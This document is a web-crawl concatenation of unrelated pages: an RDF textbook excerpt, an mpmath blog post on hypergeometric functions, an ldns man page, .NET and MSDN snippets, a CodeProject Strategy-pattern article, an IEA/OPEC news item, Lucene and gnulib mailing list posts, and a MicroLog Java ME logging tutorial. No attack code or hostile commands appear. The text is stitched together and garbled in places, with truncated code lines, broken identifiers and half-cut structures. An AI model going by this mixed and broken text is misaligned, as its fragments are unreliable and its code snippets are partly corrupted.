The main idea is to use IRIs as identifiers for entities in the subject, predicate and object positions in a triple. Data values can be represented in the object position as literals. Furthermore, the RDF data model also allows in subject and object positions the use of identifiers for unnamed entities (called blank nodes), which are not globally unique and can thus only be referenced locally. However, the use of blank nodes is discouraged in the Linked Data context. Our example fact sentence about Leipzig's mayor would now look as follows:
<leipzig.de/id>
<example.org/p/hasMayor>
<Burkhard-Jung.de/id> .
(subject) (predicate) (object)
This example shows that IRIs used within a triple can originate from different namespaces thus effectively facilitating the mixing and mashing of different RDF vocabularies and entities from different Linked Data knowledge bases. A triple having identifiers from different knowledge bases at subject and object position can be also viewed as an typed link between the entities identified by subject and object. The predicate then identifies the type of link. If we combine different triples we obtain an RDF graph.
Definition 2 (RDF Graph). A finite set of RDF triples is called RDF graph. The RDF graph itself represents an resource, which is located at a certain location on the Web and thus has an associated IRI, the graph IRI.
Fig. 3. Example RDF graph describing the city of Leipzig and its mayor.
An example of an RDF graph is depicted in Fig. 3. Each unique subject or object contained in the graph is visualized as a node (i.e. oval for resources and rectangle for literals). Predicates are visualized as labeled arcs connecting the respective nodes. There are a number of synonyms being used for RDF graphs, all meaning essentially the same but stressing different aspects of an RDF graph, such as RDF document (file perspective), knowledge base (collection of facts), vocabulary (shared terminology), ontology (shared logical conceptualization).
The initial official W3C RDF standard [7] comprised a serialization of the RDF data model in XML called RDF/XML. Its rationale was to integrate RDF with the existing XML standard, so it could be used smoothly in conjunction with the existing XML technology landscape. However, RDF/XML turned out to be difficult to understand for the majority of potential users because it requires to be familiar with two data models (i.e., the tree-oriented XML data model as well as the statement oriented RDF datamodel) and interactions between them, since RDF statements are represented in XML. As a consequence, with NTriples, Turtle and N3 a family of alternative text-based RDF serializations was developed, whose members have the same origin, but balance differently between readability for humans and machines. Later in 2009, RDFa (RDF Annotations, [1]) was standardized by the W3C in order to simplify the integration of HTML and RDF and to allow the joint representation of structured and unstructured content within a single source HTML document. Another RDF serialization, which is particularly beneficial in the context of JavaScript web applications and mashups is the serialization of RDF in JSON. Figure 4 presents an example serialized in the most popular serializations.
|
http://academlib.com/20519/_computer_science/data_model
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
fredrikj.net / blog /
Hypergeometric 2F1, incomplete beta, exponential integrals
June 11, 2009
One of the classes of functions I’m currently looking to improve in mpmath is the hypergeometric functions; particularly 1F1 (equivalently the incomplete gamma function) and the Gauss hypergeometric function 2F1.
For example, the classical orthogonal polynomials (Legendre, Chebyshev, Jacobi) are instances of 2F1 with certain integer parameters, and 2F1 with noninteger parameters allows for generalization of these functions to noninteger orders. Other functions that can be reduced to 2F1 include elliptic integrals (though mpmath uses AGM for these). With a good implementation of 2F1, these functions can be implemented very straightforwardly without a lot of special-purpose code to handle all their corner cases.
Numerical evaluation of 2F1 is far from straightforward, and the hyp2f1 function in mpmath used to be quite fragile. The hypergeometric series only converges for |z| < 1, and rapidly only for |z| << 1. There is a transformation that replaces z with 1/z, but this leaves arguments close to the unit circle which must be handled using further transformations. As if things weren't complicated enough, the transformations involve gamma function factors that often become singular even when the value of 2F1 is actually finite, and obtaining the correct finite value involves appropriately cancelling the singularities against each other.
After about two days of work, I’ve patched the 2F1 function in mpmath to the point where it should finally work for all complex values of a, b, c, z (see commits here). I’m not going to bet money that there isn’t some problematic case left unhandled, but I’ve done tests for many of the special cases now.
The following is a very simple example that previously triggered a division by zero but now works:
>>> print hyp2f1(3,-1,-1,0.5)
2.5
The following previously returned something like -inf + nan*j, due to incorrect handling of gamma function poles, but now works:
>>> print hyp2f1(1,1,4,3+4j)
(0.492343840009635 + 0.60513406166124j)
>>> print (717./1250-378j/625)-(6324./15625-4032j/15625)*log(-2-4j) # Exact
(0.492343840009635 + 0.60513406166124j)
Evaluation close to the unit circle used to be completely broken, but should be fine now. A simple test is to integrate along the unit circle:
>>> mp.dps = 25
>>> a, b, c = 1.5, 2, -4.25
>>> print quad(lambda z: hyp2f1(a,b,c,exp(j*z)), [pi/2, 3*pi/2])
(14.97223917917104676241015 + 1.70735170126956043188265e-24j)
Mathematica gives the same value:
In[17]:= NIntegrate[Hypergeometric2F1[3/2,2,-17/4,Exp[I z]],
{z, Pi/2, 3Pi/2}, WorkingPrecision->25]
-26
Out[17]= 14.97223917917104676241014 - 3.514976640925973851950882 10 I
Finally, evaluation at the singular point z = 1 now works and knows whether the result is finite or infinite:
>>> print hyp2f1(1, 0.5, 3, 1)
1.333333333333333333333333
>>> print hyp2f1(1, 4.5, 3, 1)
+inf
As a consequence of these improvements, several mpmath functions (such as the orthogonal polynomials) should now work for almost all complex parameters as well.
The improvements to 2F1 also pave the way for some new functions. One of the many functions that can be reduced to 2F1 is the generalized incomplete beta function:
An implementation of this function (betainc(a,b,x1,x2)) is now available in mpmath trunk. I wrote the basics of this implementation a while back, but it was nearly useless without the recent upgrades to 2F1. Evaluating the incomplete beta function with various choices of parameters proved useful to identify and fix some corner cases in 2F1.
One important application of the incomplete beta integral is that, when regularized, it is the cumulative distribution function of the beta distribution. As a sanity check, the following code successfully reproduces the plot of several beta CDF:s on the Wikipedia page for the beta distribution (I even got the same colors!):
def B(a,b):
return lambda t: betainc(a,b,0,t,regularized=True)
plot([B(1,3),B(0.5,0.5),B(5,1),B(2,2),B(2,5)], [0,1])
The betainc function is superior to manual numerical integration because of the numerically hairy singularities that occur at x = 0 and x = 1 for some choices of parameters. Thanks to having a good 2F1 implementation, betainc gives accurate results even in those cases.
The betainc function also provides an appropriate analytic continuation of the beta integral, internally via the analytic continuation of 2F1. Thus the beta integral can be evaluated outside of the standard interval [0,1]; for parameters where the integrand is singular at 0 or 1, this is in the sense of a contour that avoids the singularity.
It is interesting to observe how the integration introduces branch cuts; for example, in the following plot, you can see that 0 is a branch point when the first parameter is fractional and 1 is a branch point when the second parameter is fractional (when both are positive integers, the beta integral is just a polynomial, so it then behaves nicely):
# blue, red, green
plot([B(2.5,2), B(3,1.5), B(3,2)], [-0.5,1.5], [-0.5,1.5])
To check which integration path betainc “uses”, we can compare with numerical integration. For example, to integrate from 0 to 1.5, we can choose a contour that passes through +i (in the upper half plane) or -i (in the lower half plane):
>>> mp.dps = 25
>>> print betainc(3, 1.5, 0,)
The sign of the imaginary part shows that betainc gives the equivalent of a contour through the lower half plane. The convention turns out to agree with that used by Mathematica:
In[10]:= Beta[0, 1.5, 3, 1.5]
Out[10]= 0.152381 + 0.402377 I
I’ll round things up by noting that I’ve also implemented the generalized exponential integral (the En-function) in mpmath as expint(n,z). A sample:
>>> print expint(2, 3.5)
0.005801893920899125522331056
>>> print quad(lambda t: exp(-3.5*t)/t**2, [1,inf])
0.005801893920899125522331056
The En-function is based on the incomplete gamma function, which is based on the hypergeometric series 1F1. These functions are still slow and/or inaccurate for certain arguments (in particular, for large ones), so they will require improvements along the lines of those for 2F1. Stay tuned for progress.
In other news, mpmath 0.12 should be in both SymPy and Sage soon. With this announcement I’m just looking for an excuse to tag this post with both ‘sympy’ and ‘sage’ so it will show up on both Planet SymPy and Planet Sage :-) Posts purely about mpmath development should be relevant to both audiences though, I hope.
|
http://fredrikj.net/blog/2009/06/hypergeometric-2f1-incomplete-beta-exponential-integrals/
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
ldns_dnssec_zone, ldns_dnssec_name, ldns_dnssec_rrs, ldns_dnssec_rrsets-
#include <stdint.h> #include <stdbool.h> #include <ldns/ldns.h> ldns_dnssec_zone();; /** * Set to true if this name is glue * (as marked by ldns_dnssec_zone_mark_glue()) */;_dnssec_zone_new, ldns_dnssec_name_new, ldns_dnssec_rrs_new, ldns_dnssec_rrsets_new.)
|
http://huge-man-linux.net/man3/ldns_dnssec_zone.html
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
View Complete Post,
I want to fetch data from mysql database to asp.net dropdown control. How can I do this.
I can fetch data from ms sql server to asp.net page. Please help me to fetch data from mysql database.
i have a dropdownbox and a gridview
what I want is to have a list item which populates all data in a gridview.
I have tried using list item selected value=0 but to no avail.
what is the easiest way to achieve, how would I join fields together?
return (from c in storedb.Product_Categories
where c.Category_Name.Contains(searchText) orderby c.Category_Name select new { c.Cat_GUID, c.Category_Key && " ;" && c.Category_Name // HOW CAN I DO THIS.....
|
http://www.dotnetspark.com/links/21650-linq-problem-fetching-data.aspx
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
This documentation is archived and is not being maintained.
list::front
Visual Studio 2008
Returns a reference to the first element in a list.
If the return value of front is assigned to a const_reference, the list object cannot be modified. If the return value of front is assigned to a reference, the list object can be modified.
When compiling with _SECURE_SCL 1, a runtime error will occur if you attempt to access an element in an empty list. See Checked Iterators for more information.
// list_front.cpp // compile with: /EHsc #include <list> #include <iostream> int main() { using namespace std; list <int> c1; c1.push_back( 10 ); int& i = c1.front(); const int& ii = c1.front(); cout << "The first integer of c1 is " << i << endl; i++; cout << "The first integer of c1 is " << ii << endl; }
Reference
Other Resources
Show:
|
https://msdn.microsoft.com/en-us/library/a5e17kyc(v=vs.90)
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
This is your resource to discuss support topics with your peers, and learn from each other.
01-26-2011 02:16 PM
that might be it. try creating a new project using Flex Mobile Project instead and just try the swipe down on it and then push it into the playbook simulator.
also were you able to test on the simulator with this app prior to attempting the Swipe Down ?
01-26-2011 02:32 PM
01-26-2011 02:38 PM
JohnPinkerton wrote:
Yes, prior to attempting to Swipe Down it loaded fine in simulator. Still does, just the Swipe Down doesn't work.
I wouldn't be too sure. If it isn't even building a .bar file in debug mode, I'm puzzled how (and whether) it could be building a .bar file in normal mode.
Is there any chance that it's actually failing to build anything new in either case, but is installing some old .bar file that doens't have any of the swipe stuff in it? People using IDEs that they're not too familiar with often get caught by things like that, in my experience. (One reason I try to avoid them most of the time.)
(The best way to check that is to change some prominent text string in your source, rebuild, and reinstall. If you see that unique string you're definitely succeeding at building it that way... then change the string to yet another new one and try again in debug mode, being sure nothing else has changed.)
01-26-2011 02:55 PM
Yeah, I had a problem once before of my app not actually building (JRad helped me through that one!
)
Just to be sure, I've moved buttons around and changed some background colors during all this.
Would it be possible to do a majority of the imports/functions without having to do actionscript import?
I started out doing a lot in design mode for the layout, but have switched over to now working mostly in source view.
01-26-2011 04:28 PM
hey johnp,
unfortunately the one of the things that seperates AS3 structure from flex is that you have to do explicit imports. i think in flex you can use a majority of mx / spark library with namespaces and without importing anything. you get used to it after a while though - great discipline
01-26-2011 05:16 PM
So not giving up easily I've been constantly still trying to make this work.
I found this thread in which Austin claims to have SWIPE_DOWN working in Flex.
So, following imports for Flex:
import qnx.events.QNXApplicationEvent;
import qnx.system.QNXApplication;
Added this to my existing oncreationComplete function
QNXApplication.qnxApplication.addEventListener(QNX
ApplicationEvent.SWIPE_DOWN,openAddMenu);ApplicationEvent.SWIPE_DOWN,openAddMenu);
Then rather than go through all the Trace() headache, I did this:
private function openAddMenu(event:QNXApplicationEvent):void { Alert.show("HELLO SWIPE!"); }
Ran it to the PlayBook sim, drug down - BOOM there's the alert.
So it is recognizing the SWIPE DOWN action, now to just get a menu to slide down.
04-23-2011 09:57 AM - edited 04-23-2011 10:07 AM
Here is what I did.
In my Init class I added the listener. I also declared some default variables.
private var SLIDE_TIME:int = 1;
private var VISIBLE_Y:int = 100;
private function init():void {
// my screen start stuff
QNXApplication.qnxApplication.addEventListener(QNX
ApplicationEvent.SWIPE_DOWN, appMenuDisplay);ApplicationEvent.SWIPE_DOWN, appMenuDisplay);
// get the menu height
menuGroup.y = -menuGroup.height;
}
Then I created the functions to handle the event and show and hide the menu.
private function appMenuDisplay(event:QNXApplicationEvent):void { if(menuGroup.y != VISIBLE_Y){ showMenu(); } else { hideMenu(); } } public function showMenu():void { Tweener.addTween(menuGroup, {y:VISIBLE_Y, time:SLIDE_TIME, transition:"linear"}); }
public function hideMenu():void { Tweener.addTween(menuGroup, {y:-menuGroup.y, time:SLIDE_TIME, transition:"linear"}); }
My menu group is a Spark VGroup, for those of you who don't want to do pure action script.
In other examples, people were trying to catch whether or not the mouse was swiped up or down from the top bezel. With the SWIPE_DOWN call, it doesn't matter if the mouse goes up or down. I tested this with the Browser on the simulator. It doesn't matter if you swipe up or down from the top bezel, it just hides or closes the Browser based on if it was show or hidden before.
Edit....
Just realized after I posted this, that the VISIBLE_Y should be different than the height of the menu, but basically, the menu height is needed to hide the menu. So, the initial menu Y should be the negative of the height. And the Hide should be the negative of the height.
// get the menu height
menu.y = -menu.height;
|
https://supportforums.blackberry.com/t5/Adobe-AIR-Development/Swipe-Down-Event/m-p/757287
|
CC-MAIN-2017-13
|
en
|
refinedweb
|
Pádraig Brady <address@hidden> writes: > Jim Meyering wrote: >> Pádraig Brady wrote: >> >>> Jim Meyering wrote: >>>> Eric Blake wrote: >>>>> According to Pádraig Brady on 10/5/2009 3:53 PM: >>>>>>>>> This is a new test, but FC5 is soooo old, >>>>>>>>> that I'm not sure it's worth worrying about. >>>>>>>> March 2006? >>>>>>> The failure is probably a function of the kernel. >>>>>>> Which is it? >>>>>> In summary this is what fails: >>>>>> >>>>>> $ touch a >>>>>> $ ln -s a symlink >>>>>> $ ln -L symlink hardlink >>>>>> ln: creating hard link `hardlink' => `symlink': Invalid argument >>>>>> >>>>>> `man linkat` says that AT_SYMLINK_FOLLOW is only supported since 2.6.18 >>>>>> and my FC5 system is 2.6.17 >>>>> This should fix it. I don't have access to FC5, but I tested the new code >>>>> path by priming the cache (gl_cv_func_linkat_follow=runtime ./configure) >>>>> along with a temporary setting of have_follow_really=-1 in linkat.c. I >>>>> also verified that the replacement is not picked up on cygwin 1.7, where >>>>> AT_SYMLINK_FOLLOW was implemented at the same time as linkat. >>>>> >>>>> The patch copies from areadlink.c, as well as link_follow earlier in >>>>> linkat.c, to create two new fd-relative helpers. For now, I didn't see >>>>> any reason to expose them, but areadlinkat may someday be worth making >>>>> into a full-blown module. >>>> Wow, that was quick. Thanks. >>>> I should have read this first. >>>> >>>> I was just reviewing the changes in gnulib and >>>> see a few that should be included in the imminent coreutils >>>> beta release, so will probably take this one, too. >>> Needs a couple of tweaks.. >>> >>> This needs to be added to linkat.c >>> (seems like it should be refactored somewhere?) >>> >>> #ifndef SIZE_MAX >>> # define SIZE_MAX ((size_t) -1) >>> #endif >>> #ifndef SSIZE_MAX >>> # define SSIZE_MAX ((ssize_t) (SIZE_MAX / 2)) >>> #endif >> >> This should do it: >> >>>From 6f6420cc9705dcfa545a28c674fddf5703e72c86 Mon Sep 17 00:00:00 2001 >> From: Jim Meyering <address@hidden> >> Date: Tue, 6 Oct 2009 11:11:39 +0200 >> Subject: [PATCH] linkat: avoid compilation failure >> >> * lib/linkat.c: Include <stdint.h> for use of SIZE_MAX. > > That works thanks. > > I suppose these should include stdint.h also? > > areadlink.c:# define SIZE_MAX ((size_t) -1) > areadlink-with-size.c:# define SIZE_MAX ((size_t) -1) > backupfile.c:# define SIZE_MAX ((size_t) -1) > fnmatch.c:# define SIZE_MAX ((size_t) -1) > quotearg.c:# define SIZE_MAX ((size_t) -1) > striconv.c:# define SIZE_MAX ((size_t) -1) Note that stdint.h may not be sufficient to get SIZE_MAX, quoting. */ However given that SIZE_MAX should be in stdint.h according to POSIX, maybe it makes more sense to make sure gnulib's stdint.h replacement is enabled when SIZE_MAX is not provided by the system's stdint.h? And then deprecate size_max.h in favor of stdint. > While these already include stdint.h so should probably not redefine > > fts.c:# define SIZE_MAX ((size_t) -1) > getdelim.c:# define SSIZE_MAX ((ssize_t) (SIZE_MAX / 2)) > getndelim2.c:# define SSIZE_MAX ((ssize_t) (SIZE_MAX / 2)) SSIZE_MAX should be provided by limit.h, see: The stdint.h documentation doesn't mention SSIZE_MAX: /Simon
|
http://lists.gnu.org/archive/html/bug-gnulib/2009-10/msg00081.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
Strategy methodology of Adaptive Object Modeling. Strategy methodology maintains that the operations and business rules or code flow of a class should be held as a collection of properties, as opposed to single method calls, which can changed at runtime. A Strategy pattern is a set of algorithms. So a Strategy pattern as it relates to AOM is a group of different strategies that can be dynamically added as business rules to an entity at runtime.
Using a Strategy design method is an interesting way to extend the configuration possibilities of simple class object methodology. It gives a way to define a class' operations and rules dynamically, or at runtime, from a database, configuration file or user interface. Virtually any meta-data source can define the operations for a given AOM class structure. The Strategy design method uses, in this example, interface contracts and reflection to help define the limits of the operational calls.
Here we see the exact Adaptive Object Modeling UML for the Strategy class pattern based on the Design Patterns GOF95 model. Notice that the Entity object accepts and has specific operations (or strategies) associated with it. The strategy deals with actual business rule and operational rule implementations.
We start this refactoring example where we left off from our other example article Properties. We still have the same entity and entity types, and now we would like to dynamically add some operational methods or Strategies. To accomplish this we need to create a class to hold our dynamic interface contracts that are loaded during runtime. This takes the form of a simple container (or entity-attribute type) object that holds the interfaces or contracts for speaking to different strategies. This is loaded with metadata at runtime for the specific object operation that we wish to implement. Notice that we have added a collection object OperationsCollection, which contains the shared operations between the entity and the entity type:
OperationsCollection
public interface IOperation
{
void OperationMethod(object[] parameters);
}
//Collection of attributes
public class OperationsCollection
{
public void Add(IOperation obj)
{
//.....addition code to collection
}
}
Here we see that the EntityType object from our last example has an added parameter of type OperationsCollection. This operations collection will allow the Entity object to have dynamically loaded meta-data driven business rules associated with it at runtime. Now we can store any given business rule we like within our class objects, without recompile:
EntityType
Entity
public abstract class EntityType
{
private string _typeName;
private Type _type;
private EntityAttributeCollection _attributes =
new EntityAttributeCollection();
private OperationsCollection _operations =
new OperationsCollection();
public EntityType(string name, Type type)
{
_typeName = name;
_type = type;
}
public string Name
{
get{return _typeName;}
set{_typeName = value;}
}
public Type TypeOf
{
get{return _type;}
set{_type = value;}
}
public EntityAttributeCollection Attributes
{
get{return _attributes;}
set{_attributes = value;}
}
public OperationsCollection Operations
{
get{return _operations;}
set{_operations = value;}
}
}
We have also created functional method objects inheriting from IOperation, which define the exact method operations we will allow to be adapted to our entity object. Having the interface allows us to tie that interface to any class method we wish, as long as that class implements IOperation.
IOperation
Note: The operational methods could be contained in other assemblies, the namespace encapsulation becomes unimportant, because you can add attributes or methods via the metadata, without any concern to its source at compile time. Also the operation method interface IOperation could be changed to dynamically define strongly type parameters as well, but this will be saved for either another article or your own invention. Remember, reflection is used heavily as we will see in the factory class, and is the key to dynamic representation of contractual interfaces.
public class JobOperation1 : IOperation
{
void IOperation.OperationMethod(object[] parameters)
{
Console.WriteLine("..." + this.GetType().Name +
".OperationMethod method called.");
foreach(object obj in parameters)
Console.WriteLine("... parameter Type:" +
obj.GetType() + " Value:" + obj);
}
}
public class JobOperation2 : IOperation
{
void IOperation.OperationMethod(object[] parameters)
{
Console.WriteLine("..." + this.GetType().Name +
".OperationMethod method called.");
foreach(object obj in parameters)
Console.WriteLine("... parameter Type:" +
obj.GetType() + " Value:" + obj);
}
}
We are now ready to focus on the AOMFactory class, which is a static factory implementation loosely based on Deyan Petrov's DataSourceFactory. The factory is where we will actually load our runtime data for this example..
AOMFactory
DataSourceFactory
The first piece of data we get after this revision to our Properties example is the meta-data for the operation. We will use this data to build and define all the possible types of operational interfaces we can load to our entity types, making them available to specific entities. The class with the methods we wish to add inherits from the IOperation interface, providing access to its methods directly.
string name = Convert.ToString(hash["name"]);
//the name of this attribute
if(name == null || name == string.Empty)
throw new FactoryException("No operation name specified.");
//get the attribute type
string strOperationType = Convert.ToString(hash["type"]);
if(strOperationType == null || strOperationType == string.Empty)
throw new FactoryException("No Type specified for operation " + name);
//get the type for a strongly typed parameter
Type operationType = Type.GetType(strOperationType);
if(operationType == null)
throw new FactoryException("Could not load class Type for type " +
strOperationType + " for operation " + name);
Here we make sure the class implements the interface, and creates an instance of the interface from the class type that holds the wanted operational methods. As we said above this gives a lot of flexibility to the business flow, and allows different assemblies to provide new data on the fly.
Type interfaceType =
operationType.GetInterface(typeof(IOperation).FullName);
if(interfaceType == null)
throw new FactoryException("No interface of type IOperation " +
"exists for operation " + name);
IOperation operation =
(IOperation)Activator.CreateInstance(operationType);
if(_entityOperations == null)
_entityOperations = new Hashtable();
if(!_entityOperations.Contains(operation))
_entityOperations.Add(name,operation);
The config file defines the different operations by name and their implementation classes full type name. As we said above, the actual operational namespace can be internal or external. The meta-data from the config file appears thus:
<entityOperations>
<entityOperation name="JobOperation1"
type="Strategy.ImplClasses.JobOperation1" />
<entityOperation name="JobOperation2"
type="Strategy.ImplClasses.JobOperation2" />
</entityOperations>
Next we check to see if the hashtable that will hold our Strategy interfaces exists and contains the current data. If not we will add the new operation to the entityType object.
entityType
EntityType entityType = (EntityType)Activator.CreateInstance(entityTypeOf,
new object[]{name,entityTypeOf});
foreach(string attribute in attributes)
....
foreach(string operation in operations)
if(!entityType.Operations.Contains((IOperation)_entityOperations[operation]))
entityType.Operations.Add((IOperation)_entityOperations[operation]);
The meta-data from the config file appears as below. Notice the operations XML node. This is where we put all the possible operation types by name for each EntityType instance. The operation names are comma delimited. This is how we define which strategy and business rule relationships we will associate with the entity instance.
operations
<entityTypes>
<entityType name="ExecutiveJobEntityType"
type="Strategy.ImplClasses.ExecutiveJobEntityType"
attributes="Attribute1,Attribute3"
operations="JobOperation1,JobOperation2" />
<entityType name="EmployeeJobEntityType"
type="Strategy.ImplClasses.EmployeeJobEntityType"
attributes="Attribute2,Attribute4"
operations="JobOperation2" />
</entityTypes>
We now are at a point where we can test our code.
Here we see that the entity is first established from the entity type and its operations have been called.
How can we expand this example to functional code? We need to establish how the operational methods influence the program flow, and define our entity relationships and entitytype relationships if applicable. These items we will cover in the next article.
This is the third the need of the code itself. Patterns and Adaptive models are only design templates, helpers to accommodate better overall design. I must stress that making an effort to use advanced design methodologies will strengthen your overall design ability, but like your basic coding skills, it is something that is to be learnt and cultivated.
If this or any other in this series on adaptive object modeling design is helpful to you or you have questions or comments, please e-mail me at: chris.lasater@gmail.com.
Other articles in this series include:
Christopher G. Lasater wrote:I reviewed your comment again. Actually the collection was just a storage for the strategy classes. No composite was implied. Still don't see how you figured the code was a composite.
Christopher G. Lasater wrote:Do you have an idea you would like to share that might improve the pattern?
General News Suggestion Question Bug Answer Joke Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
|
http://www.codeproject.com/Articles/10089/Refactoring-to-Adaptive-Object-Modeling-Strategy-P?msg=1855623
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
11 May 2007 17:01 [Source: ICIS news]
LONDON (ICIS news)--The International Energy Agency (IEA) has renewed its call on OPEC to increase oil output before the summer to avoid a sharp decline in global oil stocks.
?xml:namespace>
In its monthly oil market report, the Paris-based IEA estimated total OPEC production for April at 30.35m bbl/day, including ?xml:namespace>
Nigerian crude capacity shut-ins rose to 815,000 bbl/day in early May, adding to pressures caused by a gasoline market already tightened by an unusually high level of unplanned refinery outages, IEA said.
Unsurprisingly, gasoline remained the primary driver behind oil prices, with US retail prices reaching levels not seen since the post-Hurricane Katrina spike in September 2005.
Seasonal refinery maintenance and a spate of unplanned outages were expected to depress global throughput, IEA said. With demand increasing in June, this implies that there will be a further tightening of product stocks.
Refinery runs, and therefore crude demand, should rise sharply in July (2.5m bbl/day over March) as refiners seek to meet peak summer demand.
Preliminary OECD stock data continued to point to a 930,000 bbl/day draw in first-quarter total oil stocks, following on from a similar draw in the previous quarter. Forward demand cover provided by total oil inventories remained around the five-year average, but gasoline stocks are low in all regions.
World oil output in April rose by 55,000 bbl/day to 85.5m bbl/day, with OPEC supply levelling off near 30.3m bbl/day. Non-OPEC growth in 2007 trimmed to 1.0m bbl/day, plus 0.2m bbl/day of OPEC NGLs. This leaves the 2.3m bbl/day rise in the ‘call on OPEC’ by the fourth quarter running well ahead of expected OPEC capacity additions, implying lower spare capacity later in the year.
Global oil product demand was revised down marginally to 84.2m bbl/day in 2006 and 85.7m bbl/day in 2007 following adjustments to baseline historical data. The changes were centred
|
http://www.icis.com/Articles/2007/05/11/9028233/iea-calls-on-opec-to-help-build-up-stocks.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
Hi All,
I am new in lucene!
I am trying to do my own nalyzer (myAnalyzer) in lucene. I worte it and I
compile it, then i add myAnlayzer.class to the folder
\org\apache\lucene\analysis and then i create new jar files which
contains myAnalyzer and the other files, then i imported myanalyzer in
IndexFile.java successfully:
import org.apache.lucene.analysis.myAnalyzer;
after that i modified this command in IndexFile.java
IndexWriter writer = new IndexWriter("index", myAnalyzer(), true);
Unfortunately there is some error here which I couldn't recognize, I feel I
didn't missed any step, also myanalyzer.java was compiled without any error.
Thanks in advance
Farag
--
View this message in context:
Sent from the Lucene - Java Users mailing list archive at Nabble.com.
---------------------------------------------------------------------
To unsubscribe, e-mail: java-user-unsubscribe@lucene.apache.org
For additional commands, e-mail: java-user-help@lucene.apache.org
|
http://mail-archives.apache.org/mod_mbox/lucene-java-user/200807.mbox/%3C18360568.post@talk.nabble.com%3E
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
.
Microlog - a Log4j-based tool for Java ME
Introduction
When we are "logging" codes, we can insert statements into the code and get some useful output information during runtime, such as malfunction code and unexpected errors and behaviors. Examples of logging are trace statements, dumping of structures and the familiar System.out.println or printf debug statements. Although providing scattering and tangling codes - making it difficult to understand, extend and maintain the software - there is no doubt that it can help in many point of views.
Overview
In the J2SE and J2EE platforms, the log4j API offers a hierarchical way to insert logging statements within a Java program. The API offers multiple output formats and multiple levels of logging information, allowing developers to get different kinds of log messages. In the context of the J2ME platform, an interesting Logging API is called MicroLog (created by Johan Karlsson), which is based on the log4j API. For more additional information, see the MicroLog official website.
Recently, I have used the MicroLog API and I had some problems in finding good examples that could help me in using the API. So, in this post, I'll try to show you how nice this API is through the main functionalities provided by the MicroLog API, and how you can use it to do logging. First of all, you can download the latest API release at the source-forge repository. MicroLog is open-source and you can also download the source-code. Become a contributor!
Usage
The use of MicroLog revolves around 3 main classes:
- public final class Logger: Logger is responsible for handling the main log operations.
- public interface Appender: Appender is responsible for controlling the output of log operations.
- public interface Formatter: Formatter is responsible for formatting the output for Appender
With these 3 aforementioned concepts, it is possible to log different kinds of log messages.
Logger Component
The logger is the main component. In addition to other operations, the Logger component can be used to set up the Logger Level, such as DEBUG, ERROR or INFO. In the MicroLog API, the following log levels are available:
-.
A logger will only output messages that are of a level greater than or equal to it. As we can see in Table 1, if you set the Level (or global Level) to WARN, only WARN, ERROR and FATAL will be displayed.
To initiate your loggin process, first you can create a new Logger instance (as discussed ealier). There are three ways to do that, such as:
Logger logger = LoggerFactory.getLogger(); Creates a logger without a name
Logger logger = LoggerFactory.getLogger(String loggerName); Creates a logger passing a logger name (loggerName variable)
Logger logger = LoggerFactory.getLogger(Class class); Creates a logger with a class reference, such as your MIDlet class.
Appender Component
The process of logging requires that you define the messages output interface, such as to a file, to a console or to a bluetooth connection. Like Log4j, MicroLog also defines many kinds of appenders. In the context of the J2ME platform, there are many appenders that can be used in the MIDP to send your log messages, such as RecordStoreAppender, where you can store your log messages in the RecordStore, BluetoothSerialAppender, where you can send your log messages to a bluetooth connection and FormAppender, where you can show the messages into a Form (LCDUI) interface. The following Figure ilustrates a summarized UML that shows how they are organized.
The AbstractAppender defines an interface with a set of methods where all other appenders should redefine them in their own class. For instance, consider a FormAppender. It uses the doLog method to send (show) log messages to a Form reference (form.append()), clear() for cleaning up all messages (form.deleteAll()), and open() to create a new Form (default) instance.
In this section, I'll show you how to send log messages to a Form (LCDUI) interface and to a bluetooth connection. The former is shown in our first example. After creating a Logger reference (which has "Form Logger" as its name), we created a new FormAppender instance, passing our Form reference (which will display the log messages). log.addAppender(appender) can be used to associate our new appender reference. It is important to point out that you can create as many appenders as you wish, just calling addAppender(). As a result, you can send log messages, at the same time, to a File (through FileConnectionAppender) and to a datagram connection.
public class FormExample extends MIDlet {
public FormExample() {
this.d = Display.getDisplay(this); //creates display instance
this.f = new Form("Loggin"); //creates a form
this.log = LoggerFactory.getLogger("Form Logger"); //creates a Logger
this.appender = new FormAppender(this.f); //creates an appender to add log outputs
this.log.addAppender(this.appender); //adds the output log to a form
this.log.debug("Constructed object!"); //logs a message
}
protected void destroyApp(boolean arg0) throws MIDletStateChangeException {}
protected void pauseApp() {}
protected void startApp() throws MIDletStateChangeException {
this.d.setCurrent(this.f);
this.log.debug("Starting midlet..."); //logs a message
}
}
And the result is:
Our next example shows how to send log messages to a bluetooth connection. The BluetoothSerialAppender can be used to this goal, which uses the btspp protocol and can be used in two different modes: (1) The implementation tries to find the Bluetooth logger server through bluetooth lookup services, or (2) by specifying the exact url of the server, which is usefull for devices that fails to lookup the server. Microlog also has two types of server: (1) Datagram server and a (2) bluetooth server. You can download both here.
The following code demonstrates how to use BluetoothSerialAppender:
public class BluetoothExample extends MIDlet {
public BluetoothExample() {
this.log = LoggerFactory.getLogger(BluetoothExample.class); //creates a logger instance
this.log.setLogLevel(Level.DEBUG); //sets the log level
//creates a bluetooth appender
this.appender = new BluetoothSerialAppender("btspp://001F3AD69B44:1;authenticate=false;encrypt=false;master=false");
this.log.addAppender(appender); //adds the appender to the log reference
this.log.debug("Constructed object!"); //logs a message
}
protected void destroyApp(boolean arg0) throws MIDletStateChangeException {}
protected void pauseApp() {}
protected void startApp() throws MIDletStateChangeException {
this.log.debug("Starting midlet...");
}
}
In our example, we passed the exactly bluetooth server URL: btspp://001F3AD69B44:<channel>;authenticate=false;encrypt=false;master=false, where you can replace "<channel>" to a low number 1 or 2 (depending on which is being used). After the double slashes, 001F3AD69B44 represents the bluetooth logger server. The result of this example is shown in the next Figure, where I used my desktop as the bluetooth server.
WARNING: Be careful when using bluetooth-based logging. If your application already uses bluetooth connections, bluetooth buffer can get full if many data is sent and received!
Formatter Component
